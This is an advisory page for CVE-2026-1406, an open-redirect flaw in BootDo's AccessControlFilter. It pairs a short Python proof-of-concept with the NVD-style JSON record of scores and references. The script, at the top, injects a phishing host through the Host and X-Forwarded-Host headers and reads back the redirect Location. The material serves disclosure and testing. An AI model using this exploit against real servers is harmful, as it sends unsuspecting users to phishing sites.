CVE-2026-1406

import requests # CVE-2026-1406 Open Redirect PoC # Target: BootDo AccessControlFilter redirectToLogin # Attack Vector: Host Header Injection target_url = "http://target-server.com/bootdo/path" malicious_host = "evil-phishing-site.com" # Method 1: Direct Host Header manipulation headers = { "Host": malicious_host, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "text/html,application/xhtml+xml" } # Send request with malicious Host header response = requests.get(target_url, headers=headers, allow_redirects=False) print(f"Status Code: {response.status_code}") print(f"Location Header: {response.headers.get('Location', 'N/A')}") # Method 2: Using X-Forwarded-Host header headers2 = { "Host": "legitimate-server.com", "X-Forwarded-Host": malicious_host, "User-Agent": "Mozilla/5.0" } response2 = requests.get(target_url, headers=headers2, allow_redirects=False) print(f"\nWith X-Forwarded-Host:") print(f"Location Header: {response2.headers.get('Location', 'N/A')}")

{"cve": {"id": "CVE-2026-1406", "sourceIdentifier": "[email protected]", "published": "2026-01-25T12:15:46.983", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in lcg0124 BootDo up to 5ccd963c74058036b466e038cff37de4056c1600. Affected by this vulnerability is the function redirectToLogin of the file AccessControlFilter.java of the component Host Header Handler. This manipulation of the argument Hostname causes open redirect. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en lcg0124 BootDo hasta 5ccd963c74058036b466e038cff37de4056c1600. Afectada por esta vulnerabilidad es la función redirectToLogin del archivo AccessControlFilter.java del componente Host Header Handler. Esta manipulación del argumento Hostname causa redirección abierta. El ataque puede ser iniciado remotamente. El exploit ha sido divulgado públicamente y puede ser utilizado. Este producto utiliza un modelo de lanzamiento continuo para entregar actualizaciones continuas. Como resultado, la información de versión específica para lanzamientos afectados o actualizados no está disponible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/webzzaa/CVE-/issues/5", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.342794", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.342794", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.736271", "source": "[email protected]"}]}}